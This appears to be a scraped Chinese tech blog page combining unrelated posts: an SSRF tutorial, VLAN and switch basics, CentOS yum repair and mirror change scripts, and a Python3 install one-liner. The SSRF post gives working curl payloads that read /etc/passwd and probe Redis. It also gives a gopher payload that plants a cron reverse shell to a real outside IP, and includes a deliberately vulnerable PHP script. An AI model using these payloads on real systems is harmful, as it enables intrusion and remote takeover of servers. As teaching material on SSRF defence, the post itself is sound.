SSRF漏洞攻击与防御 1.概述SSRF(Server-side Request Forge, 服务端请求伪造)。由攻击者构造的攻击链接传给服务端执行造成的漏洞，一般用来在外网探测或攻击内网服务。2.SSRF的危害1.扫内网2.向内部任意主机的任意端口发送精心构造的Payload3.DOS攻击（请求大文件，始终保持连接Keep-Alive Always）4.攻击内网的web应用，主要是使用GET参数就可以实现的攻击（比如struts2，sqli等）5.利用file协议读取本地文件等3.漏洞利用CURL支持协议dict protocol (操作Redis)curl -vvv 'dict://127.0.0.1:6379/info'file protocol (任意文件读取)curl -vvv 'file:///etc/passwd'gopher protocol (一键反弹Bash)注意: 链接使用单引号，避免$变量问题curl -vvv 'gopher://127.0.0.1:6379/_1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a/1 bash -i >& /dev/tcp/103.21.140.84/6789 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a'<?php function curl($url){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); } $url = $_GET['url']; curl($url); ?>漏洞代码testssrf.php（未作任何SSRF防御）

广播危害及广播隔离 广播的危害1.增加终端/设备的负担，安全性/病毒传播广播隔离1.路由器、防火墙、三层交换机（物理隔离）缺点：成本高，不灵活2.VLAN（交换机层面实现的逻辑隔离）缺点：可靠性不足，可以通过VLAN ID实现跨域通信优点：方便灵活，成本低VLAN技术详解交换机开启VLAN后，每个VLAN存在一个ID通过端口建立VLAN表实现对数据通信的隔离（静态VLAN）通过MAC地址建立VLAN表实现对数据通信的隔离（动态VLAN）通过8021.x端口认证基于账号划分VLAN默认VLAN交换机默认存在5个VLAN，其中VLAN１默认包含全部端口＃TRUNK链路/公共链路/中继链路技术作用：使所有VLAN数据通过trunk链路原理：交换机在所有数据帧上加标签，用于区别不同的VLANtrunk标签ISL标签：cisco私有的标签，标签大小30字节，26+4字节属于内部标签802.1q标签：共有协议所有厂家均支持标签大小4字节交换机端口链路类型：接入端口：一般也称access口，一般用于连接PC。只能属于一个VLAN中继端口：trunk端口，一般用于连接其他交换机，属于公共端口，允许所有VLAN数据的通过。

交换机工作原理及交换机基本常识 1.收到一个数据帧后：首先学习帧中的原MAC地址来形成MAC地址表2.检查帧中的目标MAC地址，并匹配MAC地址表：如MAC地址表中有匹配，则单播转发如MAC地址表中无匹配，则除接收端口外广播转发3.MAC地址表老化时间默认为300秒交换机接口类型1.E 十兆口 2.F 百兆口 3.G 千兆口 4.Te万兆口速率自适应速率匹配失败则会 F1/0 1为模块号/0为端口号端口状态：down/updown的三种状态1.手工停用 2.速率不匹配 3.双工模式不匹配（duplex），双工模式有三种单工，双工，半双工交换机的工作模式1.用户模式：可以查看交换机的基本简单信息，不能修改任何配置 2.特权模式：用户模式下输入enable，进入#状态，该模式下能查看所有配置，但不能修改，能做初始化，测试等操作。 3.配置模式：特权模式下输入configure terminal，该模式下默认不能查看配置，能修改配置且全局生效 4.接口模式：配置模式下输入interface 接口号，该模式下默认不能产看配置，能修改配置且仅对接口生效

centos7.9 2009 误删python2.7，导致yum失效解决方法 一键脚本python-yum.sh<!--more--> #临时文件目录准备 cd /root/ mkdr yum cd ./yum #下载相关资源包 wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/dbus-python-devel-1.1.1-9.el7.x86_64.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/libxml2-python-2.9.1-6.el7.5.x86_64.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/python-2.7.5-89.el7.x86_64.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/python-backports-1.0-8.el7.x86_64.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/python-backports-ssl_match_hostname-3.5.0.1-1.el7.noarch.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/python-chardet-2.2.1-3.el7.noarch.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/python-iniparse-0.4-9.el7.noarch.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/python-ipaddress-1.0.16-2.el7.noarch.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/python-kitchen-1.1.1-5.el7.noarch.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/python-libs-2.7.5-89.el7.x86_64.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/python-pycurl-7.19.0-19.el7.x86_64.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/python-setuptools-0.9.8-7.el7.noarch.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/python-urlgrabber-3.10-10.el7.noarch.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/rpm-python-4.11.3-45.el7.x86_64.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/yum-3.4.3-168.el7.centos.noarch.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/yum-metadata-parser-1.1.4-10.el7.x86_64.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/yum-plugin-aliases-1.1.31-54.el7_8.noarch.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/yum-plugin-fastestmirror-1.1.31-54.el7_8.noarch.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/yum-plugin-protectbase-1.1.31-54.el7_8.noarch.rpm wget https://mirrors.aliyun.com/centos/7.9.2009/os/x86_64/Packages/yum-utils-1.1.31-54.el7_8.noarch.rpm #安装相关拓展包 rpm -Uvh RPM* yum* python* lib* db* #测试python python exit () #测试yum yum list

中国法律大全 《中国法律大全》.rar

Centos 换源，停用fastestmirror插件 1.首先备份原来的cent os官方yum源cp /etc/yum.repos.d/CentOS-Base.repo /etc/yum.repos.d/CentOS-Base.repo.bak2.获取阿里的yum源覆盖本地官方yum源wget http://mirrors.aliyun.com/repo/Centos-7.repo 3.清理旧包yum clean all 4.重新生成缓存yum makecache 停用fastestmirror插件 vi /etc/yum/pluginconf.d/fastestmirror.conf修改内容 enabled = 1//由1改为0

Python3 一键安装脚本 yum -y install wget && yum -y groupinstall "Development tools" && yum -y install zlib-devel bzip2-devel openssl-devel ncurses-devel sqlite-devel readline-devel tk-devel gdbm-devel db4-devel libpcap-devel xz-devel && wget https://www.python.org/ftp/python/3.5.5/Python-3.5.5.tar.xz && mkdir /usr/local/python3 && tar -xvJf Python-3.5.5.tar.xz && cd Python-3.5.5 && ./configure --prefix=/usr/local/python3 && make && make install && ln -s /usr/local/python3/bin/python3 /usr/bin/python3 && ln -s /usr/local/python3/bin/pip3 /usr/bin/pip3 && sudo yum -y install epel-release && sudo yum -y install python-pip